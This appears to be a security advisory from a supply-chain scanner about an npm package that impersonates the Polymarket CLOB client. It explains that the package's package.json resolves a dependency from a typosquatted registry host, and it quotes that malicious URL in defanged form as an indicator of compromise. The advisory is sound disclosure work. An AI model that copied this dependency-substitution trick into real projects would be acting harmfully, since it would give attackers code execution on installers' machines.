@polymarkets/clob-client-v2@1.0.2
Malicious code in @polymarkets/clob-client-v2 (npm)
Analysis
@polymarkets/clob-client-v2@1.0.2 impersonates the legitimate Polymarket CLOB client SDK (@polymarket/clob-client) using a combosquat scoped name, and ships a package.json whose dependency list resolves a real dependency from a look-alike registry host instead of the npm registry: "typescript-eslint": "hxxps://registrynpmjs[.]to/typescript-eslint-8[.]58[.]2[.]tgz". Any install of this package fetches and installs an attacker-controlled tarball from registrynpmjs.to (a typosquat of registry[.]npmjs[.]org) as part of the dependency tree, giving the operator arbitrary code execution in the installer's environment at install time. The rest of the package is a near-verbatim copy of the genuine SDK (same description, repository URL, MIT license, viem/axios/@ethersproject dependency set, dist/index.cjs + dist/index.js bundles), so the malicious dependency entry is the only deviation from the upstream code. The package declares no lifecycle hooks and the bundled JS contains no obfuscation, eval/atob, child_process, or credential-harvesting code — the attack is delivered entirely through the substituted dependency URL. IOC: registrynpmjs.to (hxxps://registrynpmjs[.]to/typescript-eslint-8[.]58[.]2[.]tgz).
- analyzed by
- Leitwacht
- first seen
- Oct 8, 2026, 12:31 AM
- analyzed
- Oct 8, 2026, 12:27 PM
Related advisories
- @polymarkets/clob-client-v2@1.0.3 same package
- @polymarkets/clob-client-v2@1.0.4 same package
- @polymarkets/clob-client-v2@1.0.5 same package
- @polymarkets/clob-client-v2@1.0.6 same package
- solidity-map@2.21.0
- sbirontime@1.0.0
- sbman@1.0.0
- bigops-chat-transfer@35.3.6
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.